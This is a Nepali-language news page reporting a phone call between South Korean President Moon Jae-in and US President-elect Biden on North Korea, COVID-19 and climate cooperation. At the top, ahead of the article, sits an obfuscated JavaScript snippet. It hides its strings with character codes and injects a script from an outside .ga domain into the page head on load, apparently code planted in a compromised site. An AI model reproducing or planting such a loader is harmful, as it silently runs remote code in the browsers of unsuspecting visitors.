Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); बाइडेन र मूनबीच टेलिफोन वार्ता, सहकार्य गरेर जाने प्रतिबद्धता  – जनदिशा

बाइडेन र मूनबीच टेलिफोन वार्ता, सहकार्य गरेर जाने प्रतिबद्धता 

Last Updated Date:

दक्षिण कोरियाली राष्ट्रपति मून जाए–इन र अमेरिकी राष्ट्रपति–निर्वाचित जो बाइडेनबीच बिहीबार टेलिफोन वार्ता भएको छ ।

दक्षिण कोरियाको राष्ट्रपति कार्यालय चियोङ वा डाइका अनुसार उक्त वार्ता करिब १४ मिनेट लामो भएको थियो । वार्ताका क्रममा दुबै नेताबीच उत्तर कोरियाली आणविक मामिला सुल्झाउन मिलेर सहकार्य गर्ने बारेमा सहमति भएको थियो ।

राष्ट्रपति मूनका प्रवक्ता काङ मिन–सियोकका अनुसार राष्ट्रपति–निर्वाचित बाइडेनले हिन्द–प्रशान्त क्षेत्रको सुरक्षा र समृद्धिका सन्दर्भमा दक्षिण कोरिया अत्यन्त महत्वपूर्ण मुलुक रहेको बताएका थिए ।

त्यस अवसरमा राष्ट्रपति मूनले बाइडेन समक्ष सियोल–वासिङटनबीचको साझेदारीलाई थप समुन्नत बनाउन “निकट संचार सम्पर्क स्थापना” गर्न आग्रह गरेका थिए । प्रवक्ता काङले दुबै मुलुकबीच लोकतन्त्र र मानव अधिकारको रक्षाका सन्दर्भमा ७० वर्षदेखिको अटुट साझेदारी रहेको स्मरण समेत गरेका थिए ।

बाइडेनले दक्षिण कोरियासँग अमेरिकाको सुदृढ सुरक्षा निरन्तर रहने प्रतिबद्धता व्यक्त गर्नुका साथै उत्तर कोरियाको आणविक मामिलाको समाधानका लागि साझेदारी गर्ने बताएका थिए  ।

दुबै नेताले विश्वव्यापी रुपमा उत्पन्न कोभिड–१९ र जलवायु परिवर्तन समेतका विषयमा आपसी सहयोगलाई थप विस्तार गर्न सहमति जनाएका थिए । प्रवक्ता काङका अनुसार बाइडेनले अमेरिकी राष्ट्रपतिको शपथ गरेलगत्तै जतिसक्दो चाँडो भेटघाट गर्न राष्ट्रपति मूनले प्रस्ताव गरेका थिए  ।

गत साता बाइडेन अमेरिकी राष्ट्रपतिमा निर्वाचित घोषणा भएको अनौपचारिक विवरण सार्वजनिक भएपछि यो उनीहरुको पहिलो प्रत्यक्ष संवाद हो। एजेन्सी 

यो सामग्री सेयर गर्नुहोस

तपाईलाई माथिको समाचार/लेख कस्तो लाग्यो ? प्रतिक्रिया दिनुहोस ।
Top